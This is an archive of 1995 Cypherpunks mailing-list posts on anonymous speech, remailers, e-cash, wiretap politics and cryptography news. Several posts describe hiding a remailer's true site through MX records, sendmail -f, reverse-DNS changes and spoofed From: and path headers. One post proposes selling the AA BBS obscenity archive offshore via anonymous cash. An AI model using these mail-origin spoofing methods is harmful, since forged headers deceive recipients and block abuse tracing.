> little anonymous _US_ political speech.  Furthermore, sedition is a crime,
....
> I believe, therefore, that both the court and the dissent bode poorly for
> anonymous encrypted mail.

But anonymous handbills are quite common, posted all over the place
here in my home town, and the Supreme Court ruled quite properly that
identities are not required for speech. Likewise, radio call it shows
are dominated by anonymous call-ins.

Ditto for "Name Witheld by Request" letters to the editor, etc.

Lots of speech is not anonymous, because Congresscritters are
identified, because Rush Limbaugh obviously _wants_ his name
publicized, because I want my name attached to my views, etc. But not
because there's any law saying political speech cannot be anonymous.

Quite the contrary.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: moulton@netcom.com (Fred C. Moulton)
Date: Sat, 21 Jan 95 15:50:32 PST
To: cypherpunks@toad.com
Subject: Computerworld Article
Message-ID: <199501212347.PAA10248@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I have recently seen several messages about the article in the 
14-Jan-95 issue of The Economist, I do not recall seeing any
mention of a similar, but shorter article in the 16-Jan-95
issue of Computerworld, p.20.

The Computerworld article covers much of the same ground,
however I will quote the last three paragraphs of the story.
Tim May and Cypherpunks are mentioned at the end.

        At one point in 1994, rank-and-file members
    were angrily posting "EFF sellout" notes on the
    Internet.  The reason was the EFF's decision to
    negotiate with sponsors of the fast-moving digital
    wiretapping bill - an anathema to many
    privacy advocates - rather than oppose the bill.
        The legislation, which was strongly backed
    by the Federal Bureau Of Investigation and
    quickly passed, requires telephone companies
    to re-engineer their digital networks to enable
    court-ordered wiretaps.  The EFF agreed not to
    oppose the bill after cutting a deal to include
    some privacy protections and exclude the Internet
    and on-line networks.
        But the Washington maneuvers did not sit
    well with some EFF members.  "I've written
    them off" said Timothy C. May, co-founder of
    the Internet's Cypherpunks discussion group
    encryption.  "They don't represent my interests.
    They're not a member-driven, grassroots organization."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Claborne, Chris" <claborne@microcosm.sandiegoca.ATTGIS.COM>
Date: Sat, 21 Jan 95 16:08:43 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Cripto FAQ in Hypertext HTML
Message-ID: <2F21A118@microcosm.SanDiegoCA.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain



   Because I wanted to share the RSA Criptography FAQ on WWW with our local 

users, I have converted your document, verbatum, to HTML Hypertext. 

                                                                              

The entire Table of Contents is clickable so that you can zoom to the 
particular
area of interest. 

                                                                              

I can FTP somewhere public  you would like (I don't know where to stash this 

kind of thing.
                                                                              

It could probably use some more links in it where the document suggest that 
the
reader go to another section for more information but... I will leave that 
up
to someone else. 

 -- 
                                                                              

                                       ...  __o 

                                      ..  _`\<,_ 

Chris.Claborne@SanDiegoCA.ATTGIS.Com  ...(*)/ (*).          CI$: 76340.2422 

PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA 

<#include standard disclaimer regarding my opinion an not my company's > 

<#include some philosophical comment > 
                                         




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@rahul.net
Date: Sat, 21 Jan 95 16:41:42 PST
To: cypherpunks@toad.com
Subject: transient guerrilla remailers
Message-ID: <199501220041.AA02723@bolero.rahul.net>
MIME-Version: 1.0
Content-Type: text/plain


If c2.org can offer RIAB accounts on a pre-paid basis, what's to
stop people interested in the cause from paying anonymously,
setting up the RIAB, and just walking away? When the pre-paid period
expires, the remailer goes away. If the RIAB package could communicate
its existence and impending death to the pinging and verification services, 
the transient nature of remailers wouldn't be a problem. It would be hard
to harass an unknown walkaway remailer operator who has no involvement
with the day to day operations. If Tim's theory of isolating the
responsibilities of the remailer operator and the site owner are held to
be valid, c2.org would be off the hook. After all, c2.org didn't actually
set up the remailer, John Doe did. Finding JD would be impossible from
a practical standpoint, and since the remailer only lived for a few months,
the motive to find and attack it is less. . . a true "Guerrilla" RIAB.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 21 Jan 95 17:04:03 PST
To: cypherpunks@toad.com
Subject: AA + Anonymous ECash = Unhappy Fundies
Message-ID: <199501220101.RAA20030@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


hkhenson@cup.portal.com writes:

 > AA BBS is still up, and may well stay up for the whole time
 > Robert is in prison.  He has no other way to support his
 > family or pay for legal defense.  Also, outside of western
 > TN, OK, Utah, and other backwards places, what he is selling
 > is legal--even protected under the First Amendment.  (Though
 > some of it *is* kinda gross :-) )

But certainly no worse than the stuff which regularly flows
through a.b.p.tasteless and a.b.p.bestiality.

 > AA BBS is up to about 25,000 files.  There is a good chance
 > that they will be available through the internet at some
 > point.

It strikes me that this would be the perfect way to generate
consumer interest in anonymous digital cash protocols.  The
entire AA collection, hooked up to the net through a T-3, and
available for a nominal fee per GIF, could easily make the AA
Sysops millionaires by the time their sentences are over.  Such a
setup would make their pictures available to everyone, not just
the limited number of people their BBS has the capacity to
handle.

Perhaps the server could be placed securely overseas in a neutral
country which still respects privacy and free speech.  Orders could
be encrypted using the server's PGP key and the customer could 
specify the passphrase to be used to IDEA encrypt the "goods"
prior to shipment, ala NetBank.  

 > Trying to control information in the network age is about
 > as sucessful as pissing into the wind.

When the government pisses into the wind, the citizens get wet.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: werewolf@io.org (Mark Terka)
Date: Sat, 21 Jan 95 15:48:40 PST
To: cypherpunks@toad.com
Subject: Freenet Remailers (Again)
Message-ID: <1zO8lOwsccw0077yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I keep periodically asking this question, but has any progress been made on
making the remailer software compatible with the remailer software found on
Freenets?

The question is even more pertinent now that we seem to be having a problem
maintaining a satisfactory number of remailers operational and reliable. Is
there any consensus as to whether it can be done  or not? I'd give it a shot
using my Cleveland account to see how workable it is (ie, how long it takes
for the Freenet operators to shut it down :>).

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLyGQcHBFBj7pSNyhAQGC2wf/ZwzouQWeUXCok0DgfxRUViBQdNsQhKAE
sb0ODG5EubBCDFjIr9KacMyv6++OiqlOZfhNH9X+PCKOa21zJ5AjvNazfpETZnrw
zRHgQscOlbdG+lLb/DMZSwIt7cKMaRgY2fp26W3nd20ORiWFtzMpXrSVKj5p/RkZ
c4ygPUGu6yGUDSltl1HMnZW4yjkU9yOBiGY39xubmF/4idmNcZFFj7rpGEpQMncd
3VNyeCz7+yDhRvcSXP8Qazv38R79d3FTgMTOJ82gcXUSfoSCrvQHQvFkLOcS/xGv
pmYX+wSqDvLfT+jKdq3t3D4jwVa0FLBN+dMhpIsrUu4xLDLONnYHWA==
=Pg+A
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 21 Jan 95 18:35:17 PST
To: cypherpunks@toad.com
Subject: Re: AA + Anonymous ECash = Unhappy Fundies
In-Reply-To: <Pine.3.89.9501211849.A10943-0100000@Tux.Music.ASU.Edu>
Message-ID: <199501220233.SAA07490@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Ben Goren <ben@Tux.Music.ASU.Edu> writes:

 > Actually, this strikes me as a worst case scenario as far
 > as promoting cryptography goes.

It's two things.  It's a "killer app" for strong crypto, and at
the same time, a crypto public relations disaster.

Let me now make the argument that the advantages of the first far
outweigh the disadvantages of the second.

Success in spreading cryptography will not be achieved by
convincing the government that we are all nice people with noble
motives and asking their permission.  It will be achieved by
writing neat code like PGP which protects privacy and individual
freedom regardless of the plans of the state.

The public has already been indoctrinated by the government that
cryptography permits Terrorists, Pedophiles, and Drug Dealers to
thumb their noses at law enforcement, and has been fed a
comprehensive series of alarmist scenarios about what this might
imply.  Terms like "message laundering" are beginning to be used
in the media to describe fundamental Cypherpunk technology, and
the level of public anxiety about such issues is being
deliberately raised.

Robert Anton Wilson once commented that freedom and democracy
make infrequent appearances in the totality of human history
because "All you have to do is frighten the people, and they will
beg you to take their freedoms away." We probably only have a
short time remaining in which to implement a privacy-friendly
world Net before the Powers That Be(tm) engineer consent for the
implementation of something much more Draconian.

Given the current political climate, there is therefore little
incremental heat likely to be born from the revelation that
strong crypto permits people to purchase AA GIFs, and
considerable likely benefit from being able to implement and test
strong crypto based digital cash technology in conjunction with a
virtually unlimited highly motivated customer base.

There is also the added advantage of generating revenue to assist
the AA BBS Sysops with their legal problems, before the
precedents created become OUR legal problems.

 > Don't get me wrong--I have no interest in telling people
 > they can't look at whatever pictures they want, or prevent
 > others from selling those pictures to them. But...to make
 > such a close association between what Joe Public considers
 > degenerate trash and cryptography....

Some Islamic country (I forget which one) quashed opposition by
the clergy to the introduction of television by reading the Koran
over the first television channel to be installed.  Our
government does much the same in reverse, by demonstrating to the
stupid peasants how unwanted cryptographic technology can be used
to conceal pictures of naked children or bomb plans.

 > The "cause" will do much better if the first major
 > association is made with something much less controversial.
 > Girl Scout cookies, say.

Fear, Greed, and Gonads are the major human motivators which must
be tapped for symmmetry-breaking change in social organization to
occur. AA GIFs are directly targeted at the third of these.  Girl
Scout Cookies have no significant cross-section with any of these
motivators, are already available everywhere, and are much more
difficult to transmit in binary form. :)

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Goren <ben@Tux.Music.ASU.Edu>
Date: Sat, 21 Jan 95 17:36:06 PST
To: Mike Duvos <mpd@netcom.com>
Subject: Re: AA + Anonymous ECash = Unhappy Fundies
In-Reply-To: <199501220101.RAA20030@netcom5.netcom.com>
Message-ID: <Pine.3.89.9501211849.A10943-0100000@Tux.Music.ASU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Jan 1995, Mike Duvos wrote:
> hkhenson@cup.portal.com writes:
> [. . .]
>  > AA BBS is up to about 25,000 files.  There is a good chance
>  > that they will be available through the internet at some
>  > point.
> 
> It strikes me that this would be the perfect way to generate
> consumer interest in anonymous digital cash protocols [. . . .]

Actually, this strikes me as a worst case scenario as far as promoting
cryptography goes. Don't get me wrong--I have no interest in telling
people they can't look at whatever pictures they want, or prevent others
from selling those pictures to them. But...to make such a close
association between what Joe Public considers degenerate trash and
cryptography.... 

The "cause" will do much better if the first major association is made
with something much less controversial. Girl Scout cookies, say. 

b&
--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Marner <dmarner@mis.nu.edu>
Date: Sat, 21 Jan 95 19:40:23 PST
To: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <m0rVsjT-000vEKC@myriad.pc.cc.cmu.edu>
Message-ID: <199501220337.DAA26921@mis.nu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 21 Jan 95 22:12 EST  Matthew Ghio wrote:

>
>Well, to obscure the origin of your outgoing mail, you could simply
>forward via another remailer.  However, delivering directly to SMTP
>port 25 would probably be a good idea.  Sendmail has an option to
>set the from using -f, but you have to have it configured to allow
>it.  Normally only root, uucp and daemon are allowed to use this
>option.

This still won't quite do it. Clever mailers on the other end of
the connection (sendmail included) will do a name lookup based on
the IP address.  This will (usually) return the systems canonical
name, and sendmail will make sure to stick that in the header. In 
fact, if identd is running on the sending system, it will even stick
in the userid of the sender. 

The fix involves changing the in-addr.arpa domain tables for that ip
address to make it report another name.  This will take complicity on
the part of whoever manages those tables, and will complicate things
when dealing with hosts on the remailers local network. A good way to
work around this would be to slap another ethernet card in the machine
so it has two addresses, one configured normally for that network and
the other setup to be on remailer.net (or whatever.)

Since this includes the cooperation of a local network administrator
anyway, it makes most of the MX tricks a little less useful.
                                                    -- Dan
--
Dan Marner                             dmarner@mis.nu.edu
Network Weasel                         Finger for PGP 2.6 key including the
National University                    words "GMAAAEEAK", "god" and "JAAUR"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Date: Sat, 21 Jan 95 19:14:02 PST
To: remailer-operators@c2.org
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501211739.JAA00303@tower.stc.housing.washington.edu>
Message-ID: <m0rVsjT-000vEKC@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Craig A. Johnston" <caj@tower.stc.housing.washington.edu> wrote:
> John A. Perry wrote:
> >
> > First of all, I hope you don't mind me posting this to a couple of
> > lists as I find your questions pertinent and should be of value to many
> > readers.
> 
> Oops, I actually meant to direct it to the list myself, but forgot
> to edit my headers.  Sure.
> 
> >
> > > To what extent can the operator of such a remailer really hide his
> > > actual site?
> >
> >       It depends on the level of control the remailer operator has on
> > the site that the remailer operates from.
> 
> Assume root.

What if the remailer operator is not root?

I will offer to forward mail for MX records to any address via my
system (myriad.pc.cc.cmu.edu).  If you want to run a remailer, and
have it be completely hidden from nameserver lookups, ask John Perry
to create an MX record for your domain which points to
myriad.pc.cc.cmu.edu, and tell me the address you want it forwarded
to.  I will configure my SMTP daemon to forward all mail to your
domain to the email address your remailer is run on.

> I know that you can set the 'masquerade as' thing in sendmail, but
> of course any other SMTP agents you deal with are going to
> correctly identify you when you 'HELO' and you're going to wind
> up in the header, somewhere... (well, except smail 3.1, and probably
> others.)  -- I'm assuming here the best one will be able to do will
> be equivalent to a forgery via port 25.

Well, to obscure the origin of your outgoing mail, you could simply
forward via another remailer.  However, delivering directly to SMTP
port 25 would probably be a good idea.  Sendmail has an option to
set the from using -f, but you have to have it configured to allow
it.  Normally only root, uucp and daemon are allowed to use this
option.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sat, 21 Jan 95 20:12:49 PST
To: cypherpunks@toad.com
Subject: Remailer exit points
Message-ID: <9501220404.AA12395@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


Y'know, after some thought, some of the concepts I made regarding data 
havens with anonymous locations might well apply to making exit-point 
remailers that are relatively immune from outside pressure.  Given a network 
of entry-point remailers with well-known public keys, you could advertise an 
exit-point remailer by only giving out encrypted address blocks for use with 
various well-known entry-point remailers and a public key.  The exit-point 
remailer could then substitute some random From: address and path entries to 
spoof the exit-point remailer's location.  The remailer's actual location 
would only be known by the entry point remailers, and since their 
involvement is stripped by the exit-point remailers, no one would know who 
they are to complain to them.

The spoofed exit-point remailer location could be handled by disposable MX 
entries, of the sort discussed here earlier, if it is deemed desireable to 
make the From: address valid.  The remailer operator could get the actual 
complaints, to deal with as he would.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sat, 21 Jan 95 20:39:40 PST
To: cypherpunks@toad.com
Subject: Re: Locksmith's Guild wants limit on free speech
Message-ID: <9501220430.AB13255@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:59 AM 1/21/95, Timothy C. May wrote:
> ... Check out comp.org.eff.talk for discussion of how "professional
>locksmiths" are angry that "amateur locksmiths" (unlicensed, not real
>members of the Brotherhood) are using the Net to disseminate and
>discuss the Secret and Most Arcane Knowledge of the Guild.
>
>And alt.locksmithing is carrying the stuff. ...

I checked out alt.locksmithing, based on some commentary I saw over in 
alt.current-events.net-abuse, and to be perfectly honest, there isn't really 
all that much going on along these lines, certainly nothing on the order of 
magnitude of the alt.religion.scientology crap.  One or two soreheads, but 
by net.standards they don't even really qualify as significant flamers, and 
a few (apparently) professional locksmiths who are talking about things in a 
rather friendly fashion.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: santa@northpole, org
Date: Sat, 21 Jan 95 23:55:03 PST
To: cypherpunks@toad.com
Subject: port 25 forgeries
Message-ID: <9501220736.AA22783@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Here's a port 25 forgery.  One could probably do a better one, but this
one shows you what still winds up in the headers and one can't do anything
about when dealing with sendmail or an equally smart SMTP agent.

Note than smail 3.1 is stupid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Feuer <adamfast@seanet.com>
Date: Sun, 22 Jan 95 00:05:23 PST
To: Dan Marner <dmarner@mis.nu.edu>
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501220337.DAA26921@mis.nu.edu>
Message-ID: <Pine.NXT.3.91.950121235916.6029A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Jan 1995, Dan Marner wrote about one machine having two 
canonical names:

> A good way to
> work around this would be to slap another ethernet card in the machine
> so it has two addresses, one configured normally for that network and
> the other setup to be on remailer.net (or whatever.)

  or, a less expensive solution if you use BSDI or Linux, set up an alias 
or a dummy interface (virtual interface). (under linux you also have to 
add a route from your real interface to it.) it's what i do.
   this also requires another IP address and hence cooperation of whoever 
is giving you IP numbers, but it works like a charm.

-adam

Adam Feuer
adamfast@seanet.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nutty_elf@northpole.org
Date: Sun, 22 Jan 95 00:12:52 PST
To: cypherpunks@toad.com
Subject: hmmm, port 25
Message-ID: <9501220810.AA24523@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


That's strange, that last port 25 forgery didn't behave as expected.
Just checking it.

--nutty elf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arsen Ray Arachelian <rarachel@prism.poly.edu>
Date: Sun, 22 Jan 95 00:37:00 PST
To: duquesne duke <an172607@anon.penet.fi>
Subject: Re: cel fraud
In-Reply-To: <9501071759.AA00953@anon.penet.fi>
Message-ID: <Pine.3.05.9501220348.A21277-c100000@prism.poly.edu>
MIME-Version: 1.0
Content-Type: text/plain



Oh brother, here we go again.  Now the bandits are not only going to listen in
for the serial numbers of the phone, but they'll listen in for (what?) touch
tones of the block out numbers passwords?

This has certainly not stopped promiscous mode ethernet sniffers from grabbing
passwords, and I doubt it would long keep the bandits out... :-(

If only these guys would wake up and use strong crypto...  This is a perfect
example of a government caused fucked up on a grand scale due to the fact that
we now have an installed base of millions of insecure cell phones and cell
stations.   It's probably not too late for the cell companies to start
introducing crypto cell phones, but the longer they wait, the harder the switch,
and what's worse is that they've taken the attitude that "So what if we loose
millions, we'll just raise the prices and get it all back anyway."

You certainly won't find me sporting a cell phone until we get something a bit
more secure.  :-I  At least the beeper black market isn't as vicious...

===============================================================================
| + ^ + || ' . . .   .   . .   .             Ray  (Arsen)  Arachelian        ||
|  \|/  ||   . . .  ' . ' .  : . .           rarachel@photon.poly.edu        ||
|<--+-->||.   . . |' '| .' .  .  ...    ___  sunder@intercom.com             ||
|  /|\  ||   .  . \___/ .  . . : .... __[R]                                  ||
| + v + || . oOOo /o.O\ oOOo :. : ..    |A| "And bugs to kill before I sleep"||
=========/---vvvv-------VVVV------------|I|----------------------------------/
        /      .    :   . ' : '         |D|     This signature pannel is    /
       /  The Next Bug to kill(tm)      ---     now open.                  / 
      /___________________________________________________________________/
GCS d++(---)(-) H s+++/++ !g !p !au a- w-(+) (!v | v)  C+++++ Coherent++++ 
L+ 3 C+ V+ P? E- N++ K- W W--- M++ V-- po- Y+++ t:[tos+, tng--, ds9+] 5 !j
!R G? tv+ b+++ D+ B--- e+(- | *) u--- h+++ f+(++) r++ n+(---) x**(++)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Sun, 22 Jan 95 03:35:02 PST
To: cypherpunks@toad.com
Subject: TJOAUC 1-7
Message-ID: <199501221133.DAA20304@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    Recently received by email:
  =======================================================================
 
  THE JOURNAL OF AMERICAN UNDERGROUND COMPUTING / Published Quarterly
  ======================================================================
  ISSN 1074-3111         Volume One, Issue Seven        January 17, 1994
  ======================================================================
    available for download as jauc1-7.zip of 180Kbytes from

   ** ftp site: etext.archive.umich.edu    /pub/Zines/JAUC
   ** ftp site: ftp.fc.net                 /pub/tjoauc

    of cp interest I thought:


 Call Security / Voice Crypto FAQ                     Neil Johnson

 Telecommunications Security                          Howard Fuhs

    and seen here first:

 My Life As An International Arms Courier             Matt Blaze

    lots more deleted for brevity,
    listed in the titles.txt file in the .zip
    



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Sun, 22 Jan 95 05:45:22 PST
To: cypherpunks@toad.com
Subject: CPs write code: PRNG conditioning
Message-ID: <199501221345.IAA10847@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


See ftp://ftp.clark.net/pub/cme/  for code to condition random numbers
and pseudo-random numbers.  There's more to come.

 - Carl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Sun, 22 Jan 95 07:47:00 PST
To: David Murray <davidm@iconz.co.nz>
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <199501220204.PAA29874@iconz.co.nz>
Message-ID: <Pine.3.89.9501220904.B11359-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain


Many companies are already founded on "a web of debt".
"Sallie Mae (Student Loans), Ginnie Mae (General Loans), and Freddie Mac
(Real Estate Loans)," all come to mind at the moment. They're nicely
formatted, processed and make even more money for investors as the
interest rates change.

So maybe the remailer IOU's, could be traded for the data haven IOU's,
and so forth. I think someone does have a credit card IOU situation.
The systems, and precedence for debt trading are there (and interest
rates are going up again soon, indicated the Fed last week!).

I just wonder who wants to play "collection agency"?

Love Always,

Carol Anne

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: werewolf@io.org (Mark Terka)
Date: Sun, 22 Jan 95 14:07:16 PST
To: cypherpunks@toad.com
Subject: Another Book By Schneier...
Message-ID: <yqd8lOwsccZQ077yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


Saw this on one of the cryptography conferences.....

From: schneier@chinet.chinet.com (Bruce Schneier)
Subject: E-Mail Security - New book by Bruce Schneier
Message-ID: <D2qsIJ.Dzz@chinet.chinet.com>
Organization: Chinet - Public Access UNIX
Date: Sat, 21 Jan 1995 06:25:31 GMT


                E-MAIL SECURITY WITH PGP AND PEM:
          HOW TO KEEP YOUR ELECTRONIC MESSAGES PRIVATE

                 ...a new book by Bruce Schneier

                     John Wiley & Sons, 1995
                       ISBN  0-471-05318-X
                             $24.95

The world of e-mail is the world of postcards.  Between you and
your correspondents may lurk a foreign government, a business
competitor, an overzealous law enforcement agency, or even just a
nosy neighbor.  The problem is, all of these potential
eavesdroppers, given fairly simple access tools, can read your
messages as easy as a postal worker can read your postcards.

E-MAIL SECURITY is about protecting electronic mail fm spies,
interlopers, and spoofs--people who may want to destroy, alter,
or just look at your private communications.  The book shows how
you can protect the financial information, contract negotiations,
or personal correspondence you entrust to public or private
networks--and it shows how this protection is available right
now, with free or inexpensive software.

The book discusses PGP and PEM: how they work, how they are
different, and how to choose which one is right for you.


TABLE OF CONTENTS:

Part I:  Privacy and Electronic Mail
     Chapter 1:     The Problem
     Chapter 2:     Encryption
     Chapter 3:     Key Management
     Chapter 4:     Authentication
     Chapter 5:     Certificates
     Chapter 6:     Keeping Your Private Key Private
     Chapter 7:     Odds and Ends
     Chapter 8:     Patents, Governments, and Export Laws

Part II:  Achieving Electronic-Mail Privacy
     Chapter 9:     Requirements and Features
     Chapter 10:    Privacy Enhanced Mail (PEM)
     Chapter 11:    Pretty Good Privacy (PGP)
     Chapter 12:    Comparing PGP and PEM
     Chapter 13:    Attacks Against PGP and PEM

Appendix A:    Pretty Good Privacy

Appendix B:    Privacy Enhanced Mail

*****************************************************************

If you are interested in a copy of E-MAIL SECURITY, please send a
check for $25 + $5 postage (ask for rates abroad) to:

     Bruce Schneier
     730 Fair Oaks Ave
     Oak Park, IL  60302

The book won't be available until at least the end of the month,
so please be patient.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 22 Jan 95 12:23:47 PST
To: rishab@dxm.ernet.in
Subject: "Internetpol"
In-Reply-To: <gate.gV0cZc1w165w@dxm.ernet.in>
Message-ID: <199501222022.MAA14828@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


rishab@dxm.ernet.in wrote:

> The Religious Alliance Against Pornography has been holding a biggish 
> conference in Manila; the focus is on child pornography, and a major topic
> of discussion is the evil of electronic networks. The Interpol is among those
                                                    ^^^^^^^^^^^^
> participating; the head of their kiddie-porn division claims Britain is the
> source of most European stuff, and bemoans the fact that too little is spent
> on monitoring traffic, as the war against drugs is considered more important.

Perhaps it will become "Internetpol"?

Seriously, there is considerable danger that the growing chorus of
alarmist nonsense about the Net being used for child porn, for snuff
films, for weapons secrets deals, etc., will result in the U.S.
Net.Cops linking up with their European and Asian associates.

The recent stuff on "international key escrow," a la the conference
last September, is worrisome.

(I don't think they can win, of course, but any accleration of their
efforts is cause for increased vigilance.)

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sun, 22 Jan 95 12:27:20 PST
To: bdolan@well.sf.ca.us (Brad Dolan)
Subject: Re: *More* wiretaps?
In-Reply-To: <199501201935.LAA03670@well.sf.ca.us>
Message-ID: <9501222025.AA05598@doom>
MIME-Version: 1.0
Content-Type: text/plain



> Associated Press reported on 1/20/95:
>  
> >Secretary of State Warren Christopher Friday announced 
> >plans to combat narcotics smuggling and terrorism with tougher 
> >laws and sentences and tighter control on visas for entering the 
> >United States. 
> >   
> >A senior State Department official said wiretapping was among the 
> >measures to be proposed to the Republican-controlled Congress. The 
> >official said there were ways to use wiretaps without violating 
> >Supreme Court restrictions. 
> 
> 
> Since wiretapping on court order from their no-questions-asked secret 
> court is already allowed, can they mean anything other than wiretapping 
> without court order?
> 
> Can somebody explain to me why the Clinton administration is
> considered "liberal"?  Why the Republicans are considered
> "conservative"?

To make it appear as though a choice exists in the American political
system.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 22 Jan 95 09:42:50 PST
To: cypherpunks@toad.com
Subject: Re: Locksmith's Guild wants limit on free speech
Message-ID: <199501221742.MAA25260@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
Commenting on Tim's comment about the decline of the guilds of "licensed
professionals" (I'm a licensed architect long-time arguing against the
breed's conceits and camouflages and irresponsibilities): 
 
 
Here in NYC there is a new trial policy to allow architects and engineers
to "self-certify" their construction documents as in compliance with the
building code rather than being approved by a municipal examiner. 
 
 
Over decades a sub-species has grown called "code consultants" or
"expediters", which advises and processes documents for A-E's who have
become ignorant of the arcana of the building code.  This group of several
hundred, has pretty muchly dominated, by default or by design, the
non-governmental side of construction through their specialized knowledge
of the code, procedures, interpretations, regulations and who to see for
favorable treatment in the Building Department. 
 
 
A-E's used these folks with happiness, usually, for it relieved the
self-certified high-minded animals to concentrate on the important stuff of
design and schmoozing and puffing feathers. 
 
 
On the municipal side, agency employees found that it was easier to deal
with these consultants than contrary professionals.  And, the culture
welcomed ex-public officials into their well-paid ranks to lubricate the
wheels. 
 
 
An odd result so far is that while owners and professionals like the idea
of speeding up the process they are reluctant to take on the concomitant
responsibility for deficiencies in meeting code standards in final
construction.  The city will inspect 20% to keep tabs. 
 
 
Both fear that they do not know the code well enough to take the risk of
being found at fault by random municipal inspections of construction. 
A-E's dread the liability and blame by owners for well-known construction
corner-cutting, and owners suspect their professionals competency and
ethics -- afraid that the pros will certify in ignorance or cupidity and
that the owners will face costly corrections without having the traditional
scapegoat of over-weening government to justify cheating in the field. 
 
 
The code consultants I've talked to say they wait for the animals
frightened of their own shadows to return to the safe stables.  
 
 
Perhaps "code consultants" precurse the trajectory of cryptographers? 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
